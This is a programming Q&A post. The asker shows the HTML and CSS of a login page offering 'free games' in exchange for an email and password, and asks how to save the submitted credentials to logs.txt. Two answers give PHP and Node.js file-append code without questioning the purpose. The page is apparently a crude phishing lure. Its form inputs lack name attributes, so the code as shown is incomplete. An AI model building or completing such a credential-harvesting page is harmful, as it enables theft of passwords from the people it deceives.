# Save logs from form into a txt file

Tags: javascript, html

```css
form {position: absolute; left: 45%; top: 35%;}
#email {position: relative;left: 30%;bottom: 90%;text-shadow:1px 1px #D8E3EC;color: #097BDA;}
#password {position: relative;left: 25%;bottom: 100%;text-shadow:1px 1px #D8E3EC;color: #097BDA;}
#submit {position: absolute;bottom: -30%;left: -30%;text-shadow:1px 1px #D8E3EC;padding: 0.5% 25%;border-radius: 2px;background-color: #31A1FF;border-width: 4px;border-color: #0468BB;}
#submit:hover{background-color: #67BAFF;}
#eee {border-radius: 5px;}
#ppp {border-radius: 5px;}
#titlu {position: absolute;left: 31.5%;text-shadow:2px 2px #F9FBFC;font-family: fantasy;color: #097BDA;}
body {background-image: url(background.jpg);}
#tran {opacity: 0.9;position: absolute;left: 37%;top: 20%;;width: 30px 30px;}
```

```html
<!DOCTYPE HTML>
<html>
<head>
<title>Website</title>
<link rel="stylesheet" type="text/css" href="styles.css">
</head>

<body>
<img id="tran" src="tran.jpg">
<h1 id="titlu">Welcome,please login to get free games right now!</h1>

<form class="formm" action="form.php" method="get">
<p id="email">Email</p>
<input id="eee" type="email" placeholder="Put your email here"><br />
<p id="password">Password</p>
<input id="ppp" type="password" placeholder="Put your password here"> <br />
<input id="submit" type="submit" value="GET YOUR FREE GAME NOW!">



</form>

</body>


</html>
```

So I want to add something like - when I put my email and password and press submit button, to get the logs into another file, like logs.txt.

Comment: Is it ok if I give you a PHP solution?

Comment: Yes,i'm kinda newbie,but maybe i'll get it done

Comment: Maybe you never used PHP before, remember that you need a server installed on your computer. I hope this answer helped you!

Answer (score 0):

In PHP is really simple creating files and writing something into them. If you want write a log every time someone submits your form, you just need to call this function :

```
<?php
function write_log($string) {
    $log_file = 'log.txt';       
    $string .= PHP_EOL; 
    if ($fh = @fopen($log_file, "a+")) {
        fputs($fh, $string, strlen($string));
        fclose($fh);
        return true;
    } else {
        return false;
    }
}
?>
```

Naturally it must exists a file called 'log.txt' to write in. If it extists, you just need to call this function setting your log content as the `string` parameter. Here is an example :

```
<?
//Write "Hello World" into your log.txt file.
write_log("Hello World");
?>
```

**What does `PHP_EOL` do?**
PHP_EOL is a constant the simply find the best method to break a line in the system you're using. So that you can insert multiple lines formatted in a great schema without do anything.

---

**References**
http://php.net/manual/en/reserved.constants.php
http://php.net/manual/en/function.fputs.php

Answer (score 0):

Javascript can't write to a log.txt file unless you use `scripting.FileSystemObject` which is an ActiveX and runs with IE only. I would suggest to use `console.log()` to make it happen or call a webservice to write the log in other end.

**Update**: If you are flexible, `nodeJs` can provide you a solution with `filesystem`

```
var fs = require('fs');

fs.appendFile('log.txt', 'Log text data to append', function (err) {
  if (err) throw err;
  console.log('Log updated');
});
```